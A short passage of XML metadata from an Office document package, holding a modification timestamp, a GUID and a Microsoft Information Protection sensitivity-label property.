  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-07T08:08:00Z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2024-07-07T08:01:57Z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3ca7039a-bb09-4691-b84d-73adaca821f3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>